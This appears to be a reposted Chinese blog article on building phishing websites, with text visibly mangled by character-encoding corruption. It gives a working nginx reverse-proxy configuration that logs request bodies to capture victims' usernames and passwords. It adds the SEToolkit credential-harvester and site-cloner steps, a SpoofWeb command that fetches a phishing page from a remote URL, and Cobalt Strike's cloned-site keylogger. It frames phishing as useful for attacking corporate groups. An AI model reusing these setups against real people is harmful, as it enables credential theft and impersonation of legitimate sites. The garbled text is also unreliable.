干貨|幾種簡單好用的釣魚網(wǎng)站搭建方法

時(shí)間：2023-07-06 09:03:01 | 來源：網(wǎng)站運(yùn)營

時(shí)間：2023-07-06 09:03:01 來源：網(wǎng)站運(yùn)營

干貨|幾種簡單好用的釣魚網(wǎng)站搭建方法：廢話不多說，釣魚YYDS，尤其是在對一些集團(tuán)類型的攻擊時(shí)，很好用

1、基于反向代理的釣魚網(wǎng)站搭建

一個虛假的釣魚網(wǎng)站比較容易被人發(fā)現(xiàn)，因?yàn)楣δ苁遣荒苷_使用的，即使你使用302重定向，動作也是非常明顯的（雖然也可以用，效果也還行），但是基于反向代理的釣魚網(wǎng)站搭建的話，你只是進(jìn)行了一次中轉(zhuǎn)，用戶還是訪問的是實(shí)際原來的服務(wù)器。

下載一個寶塔，寶塔可以讓我們很方便的下載nginx

wget -O install.sh http://download.bt.cn/install/install-ubuntu_6.0.sh && sudo bash install.sh記得放行端口







當(dāng)然也可以直接安裝

rm /usr/sbin/nginxrm -rf /etc/nginxapt-get remove nginxapt-get remove nginx-fullapt-get updateapt-get install nginx-full修改配置：

vim /www/server/nginx/conf/nginx.conf




修改點(diǎn)在16行，修改日志記錄；74——79行，修改代理網(wǎng)站，自己看吧

cat /www/server/nginx/conf/nginx.conf

user www www;worker_processes auto;error_log /www/wwwlogs/nginx_error.log crit;pid /www/server/nginx/logs/nginx.pid;worker_rlimit_nofile 51200;events { use epoll; worker_connections 51200; multi_accept on; }http { log_format TestLog escape=json '$request $request_body $status '; include mime.types; #include luawaf.conf; include proxy.conf; default_type application/octet-stream; server_names_hash_bucket_size 512; client_header_buffer_size 32k; large_client_header_buffers 4 32k; client_max_body_size 50m; sendfile on; tcp_nopush on; keepalive_timeout 60; tcp_nodelay on; fastcgi_connect_timeout 300; fastcgi_send_timeout 300; fastcgi_read_timeout 300; fastcgi_buffer_size 64k; fastcgi_buffers 4 64k; fastcgi_busy_buffers_size 128k; fastcgi_temp_file_write_size 256k; fastcgi_intercept_errors on; gzip on; gzip_min_length 1k; gzip_buffers 4 16k; gzip_http_version 1.1; gzip_comp_level 2; gzip_types text/plain application/javascript application/x-javascript text/javascript text/css application/xml; gzip_vary on; gzip_proxied expired no-cache no-store private auth; gzip_disable "MSIE [1-6]/."; limit_conn_zone $binary_remote_addr zone=perip:10m; limit_conn_zone $server_name zone=perserver:10m; server_tokens off; access_log off;server { listen 8088; server_name 81.68.xx.xx; index index.html index.htm index.php index.jsp login.jsp index.aspx; #root /www/server/phpmyadmin; #error_page 404 /404.html; include enable-php.conf; location /{ proxy_pass https://106.75.xx.xx; proxy_set_header Host 81.68.xx.xx; proxy_set_header X-Forwarded-For $remote_addr; } access_log /www/wwwlogs/access.log TestLog; }include /www/server/panel/vhost/nginx/*.conf;}配置完重啟

nginx -s reload

或者nginx -c /www/server/nginx/conf/nginx.conf







查看日志，發(fā)現(xiàn)成功記錄了賬戶密碼







但是經(jīng)過測試，不是所有的網(wǎng)站都能copy，有的網(wǎng)站由于一些前端樣式請求解析的問題，導(dǎo)致會出現(xiàn)亂碼、404,等一些奇奇怪怪的問題，大概率是需要使用nginx的匹配替換JS，或者h(yuǎn)eader頭等，或是跨域訪問問題

subs_filter 如

subs_filter_types text/css text/plain application/x-javascript application/javascript;subs_filter http:// 'https://';subs_filter abc.org 'xyz.net';subs_filter caoss.com 'css.net';//第一個參數(shù)是要被替換的，第二個參數(shù)是替換后sub_filter_once off; //替換所有的，默認(rèn)是on，替換第一個

2、SEToolkit

git clone https://github.com/trustedsec/social-engineer-toolkit.gitchmod 777 -R social-engineer-toolkit-master/cd social-engineer-toolkitpython setup.py install報(bào)了個錯，但是他提示可以直接使用，后來踩坑pip3問題




填坑

apt-get remove python3-pip 刪掉老的pip3vim vim /etc/apt/sources.list#加入以下內(nèi)容deb http://cn.archive.ubuntu.com/ubuntu bionic main multiverse restricted universedeb http://cn.archive.ubuntu.com/ubuntu bionic-updates main multiverse restricted universedeb http://cn.archive.ubuntu.com/ubuntu bionic-security main multiverse restricted universedeb http://cn.archive.ubuntu.com/ubuntu bionic-proposed main multiverse restricted universesudo apt-get updatesudo apt-get install python3-pip成功運(yùn)行pip3pip3 install -r requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simplepython setup.py install1）、打開setoolkit







2）、進(jìn)入set后，直接盲選輸入

1、2、3、2

分別對應(yīng)

Social-Engineering Attacks 社會工程學(xué)

Website Attack Vectors 網(wǎng)站攻擊

Credential Harvester Attack Method 憑據(jù)收割

Site Cloner 選擇克隆的方式來構(gòu)造

3）、然后選擇監(jiān)聽IP，選擇克隆網(wǎng)站







怎么說呢，測試效果不盡人意吧，有時(shí)候存在各種各樣的問題，有時(shí)候是可以成功使用的，作為教學(xué)的場景是夠用的，如果是對于新人的話，還是可以用這個工具很好的演示釣魚網(wǎng)站。

3、SpoofWeb

https://github.com/5icorgi/SpoofWeb下載后發(fā)現(xiàn)格式為windows，修改格式為unix，sed -i "s//r//" PhishingWebSrv.sh

./PhishingWebSrv.sh 您的域名 Mysql的root密碼(隨意) 釣魚頁面URL.7z 解壓密碼

./PhishingWebSrv.sh "sp.hi.org" '81PtmLoDdsi@#402njgJ4G' "https://fileproxy.io/spoofpage.7z" "PaZahey873這里手上暫時(shí)沒釣魚頁面的URL源碼，就暫時(shí)不復(fù)現(xiàn)了。

4、goblin 釣魚網(wǎng)站生成

https://github.com/xiecat/goblin

目前來說比較成熟的一款生成

5、Cobaltstrike

最大的好處就是非常的方便













開啟鍵盤記錄器后，效果如下，就是方便，并且克隆出來的網(wǎng)站也比較逼真，偶爾翻車，但是不會很頻繁







其他方法，使用WebCopy，Httrack將網(wǎng)站靜態(tài)源碼打包，然后再自行寫點(diǎn)代碼來對前端用戶名密碼進(jìn)行保存，但是我覺得有點(diǎn)麻煩了。這兩種工具更適合定制化場景，例如安服仔常做的工作“應(yīng)急演練”。

文章來源：https://www.yuque.com/iceqaq/erzlyu/iqbvvc
如有侵權(quán)，請聯(lián)系刪除-END-